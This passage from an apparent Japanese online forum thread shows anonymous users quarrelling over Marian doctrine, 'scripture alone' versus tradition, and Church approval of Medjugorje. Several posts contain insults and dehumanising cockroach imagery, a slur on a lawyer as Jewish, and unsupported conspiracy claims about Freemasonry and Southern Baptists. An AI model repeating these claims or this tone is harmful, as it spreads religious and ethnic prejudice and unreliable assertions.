マリアが原罪をもたなかったとすれば、
当然、被昇天をしています。当たり前です。
プロは当たり前のことがわからないだけ
いや、わかりたくないだけ。
>>440


443 :名無しさん@1周年:02/12/08 23:52
>>401は如何し様もねえヤツだな。くずだ。

444 :名無しさん@1周年:02/12/08 23:53
>>408もクズ。

445 :名無しさん@1周年:02/12/08 23:54

プロはアナテマで決まり!

446 :名無しさん@1周年:02/12/09 00:04
「汝の父母を愛せよ」とキリストはいわれた。
なぜ、プロテスタントは、主の母を愛せないのだろう。
主の母が何をしたというのだろう。信じられん。


447 :名無しさん@1周年:02/12/09 00:05
age


448 :名無しさん@1周年:02/12/09 00:06
>>446 

バカなだけだろ

449 :名無しさん@1周年:02/12/09 00:11

>>1が俺さんだって解ってるのに、それに乗っかって、マリア様を
こき下ろすなんざ、人間のやることじゃねえ。
聖母は「聖霊の浄配(汚れなき配偶)」とされたのだ。
聖霊を汚す罪は今の世にても、のちの世にても許されない
と主はいわれているのに、よくも聖霊の浄配を汚せるものだ。
許されると思ってるのか?
懺悔したほうがいいな。死んでからでは遅すぎるぞ。


450 :ご注意!!:02/12/09 00:12
ここでプロテスタントの方々に誹謗中傷を繰り返す
者たちはカトリックではありません。ご注意くださ
い。

カトリック教会は他教派と歩みをあわせて進むエキ
ュメニズムを推進しています。ここでプロテスタン
トを攻撃している者の多くは、カトリック教会から
否定された聖母マリアの超常現象と(本人たちが勝
手に決め込んだ)偽出現を強引に認めさせようとし
ている一部のカルト、メジュゴリエ派です。

カトリック教会は公にメジュゴリエを認めたことは
ありませんし、その行動には非難の警告も発せられ
ています↓

http://www.cwnews.com/news/viewrec.cfm?RefNum=16570

メジュゴリエの行く所には、必ず分裂と諍いと争い、
罵りがあると言われています。ご注意ください。

451 :名無しさん@1周年:02/12/09 00:14
>>450俺さん、ウザイよ

452 :名無しさん@1周年:02/12/09 00:15
>>450は俺さんの味方ですか?
私たちは俺さんのシンパを批判しているのですが?




453 :名無しさん@1周年:02/12/09 00:16

>>450

俺さんの教会となんか、どうやって、和解できるというんだ?

まともなことを書け。

454 :名無しさん@1周年:02/12/09 00:22
>>450
俺さんの教派と歩みを合わせたら、カトリックの滅亡ですが、何か?




455 :名無しさん@1周年:02/12/09 00:22
てゆうか、メジュゴリエの反対派は、最初から、
俺さんのシンパだったよね。


456 :名無しさん@1周年:02/12/09 00:23
んだんだ。(ワラ

457 :名無しさん@1周年:02/12/09 00:24
>>450
はカトリックに成り済ました俺さんだな

458 :名無しさん@1周年:02/12/09 00:27
なんだ。やっぱ、>450は俺さんかw

459 :名無しさん@1周年:02/12/09 00:30
誤解があるようだ。書いておこう。

メジュゴリエ公認されている点:

1、メジュゴリエはマリア崇敬の聖地(司教団)>>74
2、メジュゴリエに現れているのは聖母(教皇様)>>81
3、メジュゴリエへの私的巡礼認可(バチカン)>>69
4、判定の権限は司教団。(教理省)>>73
5、地元司教の判断は『私見』(教理省)>>68

B メジュゴリエの未公認の点:
超自然性の証拠>>66

460 :名無しさん@1周年:02/12/09 00:32
メジュゴリエの調査:これまでの経過。

1、1986年。ザニッチ元地元司教が、「超自然性なし」との
否定的調査結果を出す。
2、1986年、教理省はザニッチ師の結果報告を無効とし
司教団に権限を移し、再調査を命じる。
3、1991年、司教団初回報告。「まだ超自然性は確認されていないが、
無数の巡礼者を受けつけるよう支援する」
4、1993年、司教団第2回報告「メジュを聖地として受け入れる。
さらに調査は続行する」
5、1997年、ローマで落涙の奇跡を起こしたメジュゴリエの聖母像が
地元司教によって公認される。>>429
6、2001年、ヨハネ・パウロ二世、平和の元后(メジュゴリエの聖母)
への奉献の祈りをサンピエトロで公式に行う。>>75
7、現在に至る。

461 :追記:02/12/09 00:32
メジュゴリエ派たちは自分たちのスレがあるにも係らず
意見の異なるスレに乗り込んでは荒らしています↓

http://life.2ch.net/test/read.cgi/psy/1038240343/l50

http://life.2ch.net/test/read.cgi/psy/1037881489/l50

なお、「平和の元后」なる言葉一連もこの教派の関連です。
平和どころか自らが争いを作り出している事態を注視し、
カルトを厳しく断罪していきましょう!

462 :名無しさん@1周年:02/12/09 00:33
>>450メジュゴリエに現れているのは聖母です。でなければ、
司教団が『聖母崇敬の聖地』として受け入れることはありません。

ボスニアヘルツェゴビナ司教団声明(8/15/93)
「3年に及ぶ委員会の調査の後、司教団は、メジュゴリエを聖地として、
聖堂として受け入れる。これは、教会の教えと信仰に即した方法で
神の母を敬うなら、それに反対する何物ももたないことを意味する。
それゆえ、私たちはそれをさらなる調査に委ねる。教会は急がない。
ザグレブ大司教、フランジョ・クハリク枢機卿」
http://www.medjugorje.hr/vodic%20kroz%20svetiste%20en.htm

「3年に及ぶ調査の後」とは、1991年のザダル宣言以後の3年間の調査の
ことです。それによって、「聖地」と認定されたのです。ザダル宣言より、
さらに一歩進んだということです。悪あがきはやめなさい。

463 :名無しさん@1周年:02/12/09 00:36
メジュゴリエ論争の経過まとめ。

1、ザニチ司教の調査報告で否定声明(84年)
2、ラッツィンガー枢機卿、ザニチ報告を不充分とみて、突返し、
再調査と判定権を司教団に移す。(86年)
2、司教団の仮報告(ザダル声明)。まだ「超自然性」は確認できていな
いが、私的巡礼は容認。さらに調査を続行中。(91年)
3、ユーゴ、諸国家に分裂。調査委員会解散し、ボスニア・ヘルツェゴ
ビナの新調査委員会に移行。(92年)
4、ボスニア・ヘルツェゴビナ司教団、メジュゴリエを『聖地』と公認。
なお調査を急がず続行中と声明。(93年)
5、バチカン報道官ナヴァロ・ヴァルス声明。「私的巡礼はOKだが、
未認可のため公的巡礼は不可。」(96年)
6、信仰教理省ベルトーネ声明。「地元司教に公的権限なし。新委員会に
よりなおも調査中」と、91年声明を追認。(98年)
7、メジュゴリエの地元司教とフランシスコ会ついに和解。(2001年)

464 :名無しさん@1周年:02/12/09 00:39
>>461は俺さんです

465 :名無しさん@1周年:02/12/09 00:41


ヤパーリ、俺さんか…プ

466 :ご注意!!:02/12/09 00:44
ここでプロテスタントの方々に誹謗中傷を繰り返す
者たちはカトリックではありません。ご注意くださ
い。

カトリック教会は他教派と歩みをあわせて進むエキ
ュメニズムを推進しています。ここでプロテスタン
トを攻撃している者の多くは、カトリック教会から
否定された聖母マリアの超常現象と(本人たちが勝
手に決め込んだ)偽出現を強引に認めさせようとし
ている一部のカルト、メジュゴリエ派です。

カトリック教会は公にメジュゴリエを認めたことは
ありませんし、その行動には非難の警告も発せられ
ています↓

http://www.cwnews.com/news/viewrec.cfm?RefNum=16570

メジュゴリエの行く所には、必ず分裂と諍いと争い、
罵りがあると言われています。ご注意ください。

467 :名無しさん@1周年:02/12/09 00:45
>>450
俺さん。自分で作ったスレが取られたのは、
君が議論に負けたからダヨ。悔しいのは解るけど、
カトリックに成り済ますのはよくないね

468 :名無しさん@1周年:02/12/09 00:46

>>466  俺さん。自分で作ったスレが取られたのは、
君が議論に負けたからダヨ。悔しいのは解るけど、
カトリックに成り済ますのはよくないね

469 :名無しさん@1周年:02/12/09 00:48
メジュゴリエの最大の敵はサタンである。
サタンは聖母への憎しみをそそのかす。平和を破るものがサタンである。
聖母は平和の元后である。聖母が現れる場所にはサタンの軍勢が
洪水のように押し寄せる。だが、聖母の中にいるものは安全である。

「蛇は、口から川のように水を女の後ろに吐き出して、女を押し流そうと
した。しかし、大地は女を助け、口を開けて、竜が口から吐き出した川を
飲み干した。 竜は女に対して激しく怒り、その子孫の残りの者たち、す
なわち、神の掟を守り、イエスの証しを守りとおしている者たちと戦おう
として出て行った。」(黙示録12:15‐17)

470 :名無しさん@1周年:02/12/09 00:50
>>466
オランダも、長いこと、君らみたいな人たちによって、散々
「悪魔」、「偽聖母」と罵倒され続けてきたんだよ。
今年の7月に公認されたけどね。同じ間違いを犯さないようにね。
オランダの聖母を罵倒して死んだ司教、司祭、俗人は
今頃、煉獄にいるのでしょうか?地獄にいるのでしょうか?
考えただけでも恐ろしいことですね。
多くの人を惑わした聖職者も俗人も罪が重いですね。
聖職者の方がはるかに罪が重いですね。怖いことです。

471 :名無しさん@1周年:02/12/09 00:54
>>466俺さん、ウザイよ

472 :名無しさん@1周年:02/12/09 00:55
メジュゴリエ運動を開始した神父はシスターのお腹を
はらませ、ペビーちゃんを誕生させています。
(つまりカトリックの思想とは何ら関係がありません)

メジュゴリエの最大の敵は神です。
今やメジュゴリエは世界的にオームとも並び称される
ほどのカルトに発展しています。

ご注意ください↓

http://www.gospelcom.net/apologeticsindex/news1/an010315da.html

473 :名無しさん@1周年:02/12/09 00:58
>>472 また偽証しましたね。偽証は大罪ですよ。

スヴェトザル・クラジェヴィック神父(OFM)の書簡より1998年4月26日

「ひとりの」修道女が一人の司祭によって妊娠したことは事実です。
司祭はT・ヴェゴ元神父。彼は、司教から疑われていたので、
メジュにいた間、教区で司牧の仕事に就いたことはありません。
告解を聞いたこともなければ、公にミサをあげたこともありません。
滅多に修道服を着ることもありませんでした。

彼は修道女が働いていた土産物店を任されていました。
二人は、人間的な弱さに負けたのです。私はそれを知っています。
しかし、それはメジュで起きたのではありません。

474 :スヴェトザル・クラジェヴィック神父(OFM)の書簡:02/12/09 01:04
 >>473続き
枢機卿(氏名は伏せます)はクロアチアの司教の一人にいいました。
『アイルランドでも、クロアチアでも、教会の信用を落とそうとする、
この世の大きな動きがあります。やり方はよく知られています。
罪を犯した司祭を見つけて、彼とその弱点を言いふらす。
それをテレビに持ち込み、忘れられなくする。
こうして、教会に打撃を加えるのが計画です。簡単ですが効果的です』

教会の伝統では、罪人は告解して懺悔すれば許しを受けますが、
この世では罪が奨励され、罪人は十字架につけられます。
罪は決して許されず、忘れられることもありません。

今イタリアに住み、五人の子供たちを育てている、
元神父と修道女の話は控え目に言っても悲しいことです。
ヴェゴは今、大きな黙想の家を運営する司祭を手助けし、
難民救援の仕事につき、控え目な生活をして最善を尽くしています。
彼らの苦しみは、5番目の子供がダウン症で生まれたことで、
さらに大きくなりました。これも十字架です。

475 :スヴェトザル・クラジェヴィック神父(OFM)の書簡:02/12/09 01:04
神は、彼らが平和になるよう願っておられると私は信じます。
しかし、この世はそれを望まないのです。
人を憎まず、罪を憎むのが私たちのつとめであるのに、
個人と教会がしばしば攻撃され、罪が攻撃されないのに驚いています。
私たちは、それ以上罪を犯さず、罪を繰り返す危険がなくなる、
教会の告解の秘蹟を尊重すべきです。

1998年4月26日
スヴェトザル・クラジェヴィック神父(OFM)

http://www.aracnet.com/~cfpw/frsvet.php
http://www.medjugorje.org/svetletter.htm



476 :名無しさん@1周年:02/12/09 01:07
>>472そのリンクにこんな文面がありますね。
The Kronzer Foundation, is a non profit California corporation
that investigates religious fraud within the Catholic Church.
[...more...] [Need the full story? Read this]

クロンツァーは億単位の金を持っているビジネスマンで、
カトリックではありません。クロンツァーの意図は明らかです。
カトリックを混乱させるために、その莫大な資金を使っているのです。
それに乗せられたのが、リック・サルバトであり、ナリーさんです。
何者であるかを調査中です。私が感じるに、スパイであると思います。

477 :名無しさん@1周年:02/12/09 01:08
だから自分のスレでやれっつ〜の。
















(独り慰めコピペ)

478 :名無しさん@1周年:02/12/09 01:14
>>472のメジュゴリエ批判のネタ元はクロツァー。
これ、傑作!セブンスデーアドベンチストのホムペ。
クロツァーのメジュゴリエ批判を使って、
教皇様を罪の人と宣伝してる!
VATICAN EXPOSED AS VAT-OF-SIN
IS THE POPE THE MAN OF SIN?
http://www.remnantofgod.org/nl010218.htm

クロツァーの主任弁護士のヨナタン・レビ(ユダヤ人)は
バチカンの犯罪を好んで暴きまくってる人物だな。いやらしい。
http://www.localline2.com/~nicholas/Ustashe.htm

479 :名無しさん@1周年:02/12/09 01:16
フィル・クロツァーの件:調査報告

シリコンバレーの大金持ち、フィル・クロツァーは
メジュゴリエに夫婦でやってきた。
金持ちで有名だったから、プロモーターに接近された。
奥さんはメジュゴリエを熱心に信じて寄付金を出そうとした。
夫はメジュゴリエを信じなかったので、金を出すのに猛反対した。
ここで、夫婦の仲は分裂しちまった。
最後に、妻は聖母を取り、聖母を悪魔と罵る夫と別れざるを得なくなった。
夫は、悪魔の偽聖母と信じるメジュゴリエの平和の后の化けの皮を
はぐために、全資産を投入することを誓った。
以来、夫のフィルは、カネに物を言わせて、
メジュゴリエの攻撃材料を世界中から集め、訴訟を起こした。
だが、訴訟はみな、失敗している。悲劇である。
早く夫が聖母を信じて、元の鞘に収まればいいのにと
祈らずにいられない。

480 :名無しさん@1周年:02/12/09 01:21
>>477
いいかげんあきらめろ。おまえたちは全員論破されたのだからな。何を持ってきても反証材料が揃っている。諦めろ。

481 :名無しさん@1周年:02/12/09 01:24

反対派きたねーぞ。
メジュを批判するためなら、
教皇様を罵倒するのに使われているネタまでもってくるのか?



482 :名無しさん@1周年:02/12/09 01:26
>>478

サイテーだな。反対派のやることは

483 :名無しさん@1周年:02/12/09 01:31
メジュ攻撃者のネタ元

1、リック・サルバトのカトリック不良サイトUnity
2、それを丸写しして逃げたナリー元神父のサイト
3、ナリーに洗脳された哀れなボンボンのサイト
4、SSPX(ピオ10世会)のサイト(特にマイケルデービス)
5、俺さんのスレッド
6.反カトリックのユダヤ人弁護士
7、これらの情報を利用してカトを攻撃するプロ原理主義者のサイト
8、司祭の欠点をわずかでも証明する資料なら何でも
9、嫌がらせ用としてLPとベイサイドのお告げ
10、バチカンから破門通達のでているグルーナー神父系サイト
11、バチカンからも却下された故ザニッチ地元司教のネタ
12、バチカンの犯罪暴き屋で悪名高いフィル・クロツァーのサイト。

484 :名無しさん@1周年:02/12/09 01:33
メジュ反対者のカテゴリー

1、俺さんのシンパ
2、ネオのシンパ
3、ナリーのシンパ
4、ピオ会のシンパ
5、カト・リベラル
6、カト・超保守
7、プロ保守
8、プロ・リベラル
9、無神論者
10、ただの煽り厨房
11、フリーメーソン
12、LPを偽装する嫌がらせカト

485 :名無しさん@1周年:02/12/09 01:34
メジュ賛成派の特徴

1、誠意がある 2、情報が正確 3、聖座の権威を尊重 
4、品がある 5、罪を憎んで人を憎まず 6、司祭に同情的 
7、奉仕精神がある(苦労して英語を訳してくれる)
8、祈りの言葉をカキコする
9、情報源をしっかりリンクする

486 :名無しさん@1周年:02/12/09 01:39
メジュ反対派の特徴

1、誠意がない 2、情報がデタラメ 3、聖座の権威を軽視 
4、品がない  5、人を憎んで罪を憎まず 6、司祭に攻撃的
7、奉仕精神なし(原文を貼付けるだけでろくに訳さない)
8、LPやベイサイドのお告げをカキコして嫌がらせする
9、ろくに訳さない上、ネタがトンデモなのでほとんどリンクしない

487 :名無しさん@1周年:02/12/09 01:59
反対派またしても、死滅したか..................wara





488 :名無しさん@1周年:02/12/09 02:00

ゴキブリみたいにイチコロだね!


489 :名無しさん@1周年:02/12/09 02:03
反対派がゴキブリみたく顔をだしたら、すぐに『シュッ』と
反論を吹きかける。そうすると、イチコロで、死んじゃう!

痛快だね!痛快だね!痛快だね!痛快だね!痛快だね!痛快だね!

490 :名無しさん@1周年:02/12/09 02:12

ほれ!
はよう、ガセネタを持ってこんかい!
ネタギレか?ワラ
早くガセを持ってきて、笑わしてくれや。
さすがに全部使い尽くしたか?w

>>俺氏&メジュ反対派


491 :名無しさん@1周年:02/12/09 02:18
改訂版。メジュ反対者のカテゴリー
1、俺さんのシンパ
2、ネオのシンパ
3、ナリーのシンパ
4、ピオ会のシンパ
5、カト・リベラル
6、カト・超保守
7、プロ保守
8、プロ・リベラル
9、無神論者
10、ただの煽り厨房
11、フリーメーソン
12、LPを偽装する嫌がらせカト
13、俺さんの教派とエキュメニズムを推進しようとしているカト。

492 :名無しさん@1周年:02/12/09 02:22
俺さんと反対派(=サタン:反対者の意)に勝つ五つの方法
(メジュゴリエの聖母による)
http://www.medjugorje.org/ol5step.htm
1.毎日の祈り(ロザリオ)
2、水曜日と金曜日の断食
3、毎日聖書を読む
4、毎月の告解
5、聖体拝領
これをしなかったら、カトリックではないよ!
プロと同レベルに落ちないようにして!
今後、メジュゴリエに反対する者は、「俺さん」のシンパと見なします。
メジュゴリエの聖母はカトリックの最も正しい精神を教えているのだから
反対する者はプロ原理主義と同レベルです。とんでもないことです。

493 :名無しさん@1周年:02/12/09 03:54
あなた方は忘れていることが1つある。マリアが大嫌いなのは、だれか。

1、蛇、サタン、悪魔である。婦人の末は蛇の頭を踏み砕く。
2、蛇、サタン、悪魔を崇拝する組織と組織員である。

蛇崇拝のカルトはグノーシスである。
サタン崇拝のカルトは悪魔教である。
悪魔崇拝カルトは悪魔教である。

だが、もうひとつある。
蛇、悪魔、サタンの本体であるルシファーだ。
ルシファー崇拝カルトはどこか。
フリーメーソンおよび、その関連秘密結社である!
俺さんが好んで引き合いに出すリンクに、バプテストがある。
アメリカ最大のサザンバプテストは、3分の2がフリーメーソンである。
彼らが聖母を嫌う理由がわかるというものである。


494 :名無しさん@1周年:02/12/09 04:11
そうか。・・・
メジュ反対派は石クリだったか。・・・
理解できる。・・・w



495 :名無しさん@1周年:02/12/09 04:13
なるほど.........マリアの宿敵か........

496 :朝の散歩:02/12/09 09:26
>>416
何度も言うけど、私は「マリアは神の母ではない」とか、マリアの処女性を否定したり、
そういうことは一切していない。
さらに、マリア崇敬を即座に異端的である、とも言っていない。

もう一度繰り返します。
「聖伝」あるいはカルタゴ教会会議以前の流れに立つなら、マリア崇敬は教会の伝統でしょう。
そこで、カトリック教会は、この伝統(あえて聖伝とは言いません)を大切に保存しているが、
プロテスタント教会の原理は「聖書のみ」ですから、聖書からすべての伝統を洗いなおした結果、
マリアを特別に崇敬したりというようなことは、しないのです。
もちろん、マリア崇敬だけでなく、聖人崇拝も捨てました。
つまり、マリアも、また諸聖人たちも、ある意味特別な存在であることは認められますが、
それだからといって、崇拝したり崇敬したりはしないのです。(神に近い、という意味ではなく。)

要するに、カトリックの皆さんが、マリア論を取り上げて、「プロテスタントは異端だ」と言われるのが、
私には遺憾なのですよ。
プロテスタントの中には、マリア論を取り上げて、カトリックは異端だ、という人がいるようですが、
それも間違っていると思います。

497 :名無しさん@1周年:02/12/09 10:53
マリア崇拝は異端ではありません。異教です。

498 :名無しさん@1周年:02/12/09 12:36
>>496

どうかご立腹なさらないで。
カトリックと称するメジュゴリエ派だけが特別なのです。
カトリックはプロテスタントの方々とも無理なく穏便に
協調できます。

メジュゴリエ派だけがカトリック教会の姿勢に敵対し、
自分の意見を曲げない変わり者なのです。

499 :名無しさん@1周年:02/12/09 12:36
>>496プロの問題は正典のみとしたところに問題があるわけだ。
イスラエルからの正統な流れを断ち切ってまで正典に執着している。
その異常な執着は偶像崇拝の域に達している可能性もある。
聖人云々を取りやめたのは、既にキリスト教的伝承を
自ら否定したのだから当然の結果といっても過言ではない。
キリスト教徒がユダヤ教の枠内から外れ、出て行ったのと同じだ。
君達の先人は、我々の先人の唆しを受けて
正典に執着することを選びカトから出て行ったのさ。

カトやオーソの問題は、その正典・外典を作り出したことにあるのさ。
我々に打ち勝とうとして私生児を産んだマリアを天使のお告げで
処女懐妊しただとか、預言書のとおりと言い始めたのさ。
それで騙された貧困層も多かったからだ。

最初の頃は彼の存在がメシア的であるという感じであり、
マリアの処女懐妊うんぬんは描かれていない。
描いたら私生児の件に引っかかるからさ。
ナザレ派はイエスを預言書のメシアに持ち上げて、
ついに最後には神にしてしまった。しかし、預言は成就しなかった。
そのために復活云々の話を創作したのさ。

また、異教に打ち勝とうとして様々な手段を用いた。
我々が異教対策にやってきたことを彼らは盗んだんだ。
そして、我々にも同じことを始めた。
我々がキリスト教徒を憎むが、逆に巧みにキリスト教徒を
利用しているのはそういった側面があるからだよ。

500 :名無しさん@1周年:02/12/09 13:25
>>496
はまともです。
>>497
俺さん、ウザイです。
>>498
気に入らない連中をすべてメジュ賛成派と断罪する偽カトリックです。
>>499
石工です。


501 :名無しさん@1周年:02/12/09 13:31

>>496

「プロ」とひとくちにいうけどどこの教会?
200万の教派があると知人の伝道師が調べてびっくりしてたけど・・


502 :名無しさん@1周年:02/12/09 13:36
>>469
お言葉ですが
私はドイツのルター派教会で「マリアの生誕」そのほかマリアの生涯を
主日礼拝で記念する(そのための四行ほどの特別の祈りがある)だけでなく、
聖書中の人物にとどまらず、カトリックの何人かの「聖人」を信仰の模範として記憶し
マリアの場合と同じように特別の祈りで賛美するところを知っています。

プロとひとくちにいいますが、「プロテスタントの一派である自分の教派では」
とおっしゃるほうが妥当かと存じます。

503 :名無しさん@1周年:02/12/09 13:42
>>496は『プロでは』という言い方を改めるべきと思われ。『うちの教派では』と言いなおすべきと思われ。SDAなど明らかな異端的思想を包含する教派さえ、「プロ」、「聖書のみに立脚する福音派」を名乗っている。

504 :名無しさん@1周年:02/12/09 13:51
聖書のみ?意味不明ですな。
聖書が聖伝から編纂されたことは歴史的事実。
4世紀末。聖伝を無視?意味不明ですな。
>>496


505 :名無しさん@1周年:02/12/09 13:57
>496はグタグタかいてるけど、「聖書は聖伝の1部!」これがカトリック2000年の揺るがざる認識。以上です。

506 :名無しさん@1周年:02/12/09 13:59

だいたい、その聖書を編纂してあげたのも
カトリックではありませんか。
プロは何言ってるの?
恩知らずにも程があるね。







507 :名無しさん@1周年:02/12/09 14:02
ギリシャ正教も聖書と聖伝に立脚してます。お忘れなく



508 :名無しさん@1周年:02/12/09 14:07
聖書と聖伝 福音派と正教との対話。
http://plaza15.mbn.or.jp/~fnagaya/Taiwa2.htm



509 :名無しさん@1周年:02/12/09 14:10
>>505
対プロ融和を妨げている最大のファクターがこれですね

510 :名無しさん@1周年:02/12/09 14:11
プロテスタント運動に対しては、福音主義神学との対決姿勢を鮮明にし、「信仰のみ、聖書のみ」に対して、伝統的な「信仰と行為、聖書と聖伝」をカトリック神学として確認、表明

http://home.att.ne.jp/wood/aztak/untiku/toritsugi.html

511 :名無しさん@1周年:02/12/09 14:11
3)聖書と聖伝:

聖書とは、人の救いについて書かれた、神のみ言葉です。聖書は旧約聖書と新約聖書との2部に分けられます。聖書は、神が人の心に呼びかけて、筆者の固有の見方やいい方を保ちながら、神の教えを説きあかさせられています。

聖伝とは、聖霊のおん助けによって、使徒の時代から、誤りなく伝えられた、神のみ言葉です。



512 :名無しさん@1周年:02/12/09 14:12
「恩知らず」かどうかにこだわることは、寛容をもって知られる
カトリックの方に似つかわしくないなあ、と他教派ながら思います。

騙り煽りがたくさんで大変ですね。寒さつのるなかどうぞご自愛ください>カト諸兄弟姉妹

513 :名無しさん@1周年:02/12/09 14:16
◆東方正教会(オルトドクス)とギリシャ正教会
 9世紀から11世紀にかけて、カトリック教会から分離した東方正教会が東ローマ帝国におこり、帝国の滅亡後はロシアに広まり、現在は東欧諸国に伸びています。この正教会にもいくつかの分裂があったようです。
 日本には、ロシアのニコライが伝え、東京神田のニコライ堂や函館のハリストス正教会が有名です。香をたくさん炊き、多くのイコンの前でろうそくをともして祈るのが特徴で、たまねぎのような丸い屋根も正教会の特徴です。儀式はたいへん荘厳です。



514 :名無しさん@1周年:02/12/09 14:17

◆聖公会(英国国教会)
 16世紀、イギリスでヘンリー8世が、政略上の離婚をめぐって、これを
認可しないローマ教皇と対立し、イギリス独自の教会を確立しました。
彼は修道院の財産を没収し、王権を強化していったのです。しかし、
このようないきさつのため、儀式などはカトリックと近く、純然たる
新教を求める人々は清教徒(ピューリタン)となりました。
聖公会は、正式には英国国教会といい、立教大学、聖路加看護大学
などは聖公会の流れを汲むものです。儀式はカトリックに似ていますが、
組織、司祭の妻帯性とか儀式の考え方は少し違います。


515 :名無しさん@1周年:02/12/09 14:24

◆プロテスタント
 新教徒とよばれ、一般にはマルチン・ルターが1517年に引き起こした
宗教改革によって、カトリック教会から分離した人々を称してプロテス
タントと呼びます。カトリック教会の権威に対抗(プロテスタント)す
ることによって、新しい教会制度を確立しました。彼らは個人の信仰を
重んじ、儀式を質素にし、位階制を廃止し、聖書を唯一のものとし、カ
トリック教会で聖書とともに認めている教会の歴史や殉教録、公文書、
聖霊の助けのもとに使徒たちから代々伝えられた聖伝を否定しました。
 その後多くの宗派に分かれましたが、日本では、明治初年から宣教が
始まり、明治期の文学者の間にも広まり、文化人にも影響を与えました。
ルーテル、ユニテリアン、カルバン、フレンド、バプチスト、メソジスト
などさまざまな派があって、それぞれ礼拝やきまりが違いますが、日本
では日本基督教団が最大のものです。プロテスタントでは教会の指導者を、「牧師」とか、宗派によっては「長老」と呼びます。日曜日には集会を行い、聖書を読んで祈り、賛美歌を歌いますが、カトリックのミサのような聖餐式は一般にあまり行なわれないようです。 
(「カトリック冠婚葬祭」泉富士男著、「キリスト教ハンドブック」
遠藤周作編、「カトリックとプロテスタント」ホセ・ヨンパルト著 参照)

516 :名無しさん@1周年:02/12/09 14:26
age

517 :名無しさん@1周年:02/12/09 14:28

聖書のみというから、三位一体を否定する教派や、土曜日安息を守らないと救われないなどいう教派が現れるわけだ。プロテスタントいうよりもパウロ教と言うべきではないのか。

518 :名無しさん@1周年:02/12/09 14:32
いや、聖書教徒というべき

>>517

519 :名無しさん@1周年:02/12/09 14:35
エホバの証人
 エホバの証人をキリスト信者として認めることは難しいことです。
なぜなら、まず使っている聖書が正しいものではありません。自分の
都合で、いろいろな箇所を書き直しています。また、カトリックだけ
でなく、正教会やプロテスタント教会の圧倒的多数派が、キリスト信
仰の基礎として信じているキリストの神性を、エホバの証人は認める
どころか激しく否定しています。

 彼らが強調している「エホバ」の名前は、現代のすべての聖書学者が
間違っていると、指摘しています。例えば「Encyclopedia Americana
(アメリカの大辞典)」の16巻8頁に次のように書いてあります。
「エホバ。聖書に書いてあるイスラエルの神の間違った発音」。彼らは
神に向かって、エホバだけ使わなければならないと一生懸命に強調し
ています。

520 :名無しさん@1周年:02/12/09 14:37
 「エホバの証人」の起源、また根本的教えは、その創立者が決めた
キリストの再臨とこの世の終わりのことです。
 1876年ころ、エホバの証人の創立者C・T・ラッセルは、独自の
聖書解釈により、キリストの来臨は見えない形で2年前に既に行われた
と決定しました。ところが、1914年から2914年までの千年間、
地上のキリストが見える形で君臨し続けると宣言しました。その予言に
基づき、エホバの証人は作られました。1914年にそれが実現せず、
その代わりに第一次世界大戦が始まりました。キリストの君臨の始まり
をエホバの証人は2〜3回延ばしました。数年前まで、見える形で君臨
が始まるのは、第一次大戦のときにいた誰か、しかもその誰かが生きて
いる間に起こるという宣言でした。その人々は既に非常に少なくなり、
最近再修正して「いつだろうか、知らない」と告白し、エホバの証人の
信仰の基礎を捨てました。このことを知っていて、彼らの教えを信じる
人がいるでしょうか。 
(「家庭の友」なんでも質問箱より参照)

521 :名無しさん@1周年:02/12/09 14:42
聖書だけというなら、使徒信条も取っ払うべきだな。

私たちは「聖なる公なる使徒の教会」を信じます。この「公」
(カトリック)という言葉は、聖使徒の時代から教会に伝えられた
「いつでも、どこでも」ゆるぎのない正しさを意味し、たんに多くの人々
が認めて受け入れていることではありません。一時的に圧倒的に多くの
人々が認めたけれど、後の時代になって誤りが明らかになって否定される
ような「正しさ」や「普遍性」ではありません。聖像(イコン)をかかげ
て祈ることは偶像崇拝であるという考えが一世を風靡し、文字通り一握り
の勇気ある人たちの命がけの異議申し立てで、イコンの正しさが最終的に
認められた聖像破壊論争(八〜九世紀)など、真の「公」性とはどのよう
なものかをよく示すものです。
 私たちはそのような「公」性を守り抜くのが真の教会であると信じてい
ます。「正しさ」はいつでも広く受け入れられるものではありません。
特に信仰の場合「よく売れる」ことは「良さ」「正しさ」の指標では
ありません。私たちは、教会の外面的発展よりむしろ「正しい信仰」の
浸透を祈るべきでしょう。

522 :名無しさん@1周年:02/12/09 14:45

「公」性の柱、聖伝
 この「公」性を守るために教会に伝えられているのが「聖伝」といわ
れるもので、旧新約聖書・七回の全地公会(325〜787の間に全教会の
主教たちが集まり開催した会議)で定められた信仰告白(信経)及び教理
・それに準ずる地方公会の決議・聖師父の教え・奉神礼・聖規則・聖像
(イコン)を中心とした諸伝承です。
(カリストス・ウェア主教"The Orthodox Church"に拠る)。
古代の聖規則には直接現代に適用できないものもあるがその精神は不変。
http://www.orthodox-jp.com/nagoya/nandemo3.htm

523 :昼下がりの散歩:02/12/09 14:48
>>502
マリアを含め、聖書に登場する人物を祈りに覚えることは、プロテスタントでもやってますよ。

いちいちレスつけるのが面倒なので、まとめて書きますが、
200万の教派があるといって驚いたその伝道師に、私は驚いています。
200万ではありません。
大きく以下のグループに分けられます。
○ルーテル派、ルター派などのルーテル系
○改革派、長老派などのカルバン系
○会衆派
○バプテスト系
○メソジスト系(これに救世軍も含めようかな?)
○ホーリネス系(ただし、ホーリネス系をメソジスト系に含ませる考え方もあり)
○カリスマ系(ペンテコステ派、アッセンブリー派など)
○信徒団体のミッションボードから遣わされた宣教師によって設立された教会(日本イエス、同盟など)
・・・これも教派別の表に入れた方がいいのかな?識者のご指摘を請う
○聖公会(アングリカンコミュニオン)
○カトリック
以上が、教派別に分類した西方教会。東方教会は省略。

524 :名無しさん@1周年:02/12/09 14:49
聖なる伝承に中で聖書とは何なのか(第9項):
 第2ヴァティカン公会議以前のカトリックでは、啓示の源泉は聖書と
聖伝(聖なる伝承)であると教えられてきた(古い公教要理参照)。
これはプロテスタントに対する主張であった。この公会議では、啓示の
源泉は神であるから、啓示の源泉は聖書と聖伝とは言われない。これらを
キリストにおいて完成した啓示を伝達するものとして位置づける。前項で
伝承の意味を捉え直した上で、その意味で伝承は啓示を「あますところ
なく」伝えるのものとされる。この伝承と密接に結びついたものとして
聖書があり、これは神の啓示を書に書きとめたものとして、時代を超えて
啓示を「忠実」に伝えるものである。聖書は使徒伝承を使徒伝承の時代に
書に書きとめたものとして、その本文を書き変えない限り、キリストに
おいて完成した啓示を伝える。このように伝承と聖書は両者とも尊敬す
べきものである。

525 :名無しさん@1周年:02/12/09 14:51
第2章 神の啓示の伝達について(第7−10項)

キリストにおいて完成した啓示の伝達を担うもの(第7項):
 啓示が歴史の中でキリストにおいて完成したというなら、それは、
